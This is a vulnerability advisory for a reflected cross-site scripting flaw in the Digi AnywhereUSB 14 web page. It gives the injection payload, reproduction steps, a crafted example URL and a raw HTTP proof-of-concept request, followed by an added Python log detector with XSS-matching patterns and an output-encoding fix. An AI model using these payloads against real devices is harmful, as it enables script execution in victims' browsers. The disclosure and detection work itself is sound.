Headline
CVE-2019-18859: Cross Site Scripting (XSS) Vulnerability
Digi AnywhereUSB 14 allows XSS via a link for the Digi Page.
Vulnerability Type: Cross Site Scripting (XSS) Vulnerability
Vendor of Product: Digi International
Affected Product Code Base: AnywhereUSB - 14
Firmware Version: 1.93.21.19
Description: Digi AnywhereUSB 14 allows XSS via a link for the Digi Page.
Attack Vectors: A victim must open a crafted link to the Digi Page
Attack Type: Remote
Payload: //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Steps To Reproduce
1. Browse to the web page of the Digi AnywhereUSB without logging in.
2. Craft a payload like the following; when the victim opens the link, the arbitrary JavaScript runs in the victim's browser.
Example: http://<IP Address of the Digi Anywhere USB>///--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
#PoC
GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
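Added example, not part of the advisory or Digi's code: a detector that flags web-server access-log requests whose path carries script injection of the kind shown above (the request path is reflected into the page unencoded), plus the output-encoding step that prevents the reflection. The log lines are constructed in combined log format; the real device's log format is an assumption.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format, assumed); not real device logs.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Nov/2019:10:00:01 +0000] "GET /home.htm HTTP/1.1" 200 2048
192.0.2.55 - - [01/Nov/2019:10:00:07 +0000] "GET //--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E HTTP/1.1" 404 512
192.0.2.10 - - [01/Nov/2019:10:00:09 +0000] "GET /login.htm?next=%2Fhome.htm&confirm=1 HTTP/1.1" 200 1500
"""

# Request line inside the quoted part of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')

# Markers of script injection, checked after URL-decoding: script tag open/close,
# javascript: URLs, inline event handlers and the String.fromCharCode obfuscation
# used by the advisory's payload.
XSS_MARKERS = re.compile(
    r'</?script|javascript:|\bon\w+\s*=|String\.fromCharCode', re.IGNORECASE
)


def suspicious_requests(log_text):
    """Return (client_ip, decoded_target) for every request whose path carries XSS markers."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # Decode twice: a payload may arrive percent-encoded once or twice.
        target = unquote(unquote(m.group("target")))
        if XSS_MARKERS.search(target):
            hits.append((line.split()[0], target))
    return hits


def render_path_safely(path):
    """Mitigation side: HTML-encode a request path before echoing it into a page body
    or attribute, so that <, >, quotes and & cannot close or open markup."""
    return html.escape(path, quote=True)


if __name__ == "__main__":
    for client, target in suspicious_requests(SAMPLE_LOG):
        print(f"{client} -> {target}")
        print("safe to echo as:", render_path_safely(target))
```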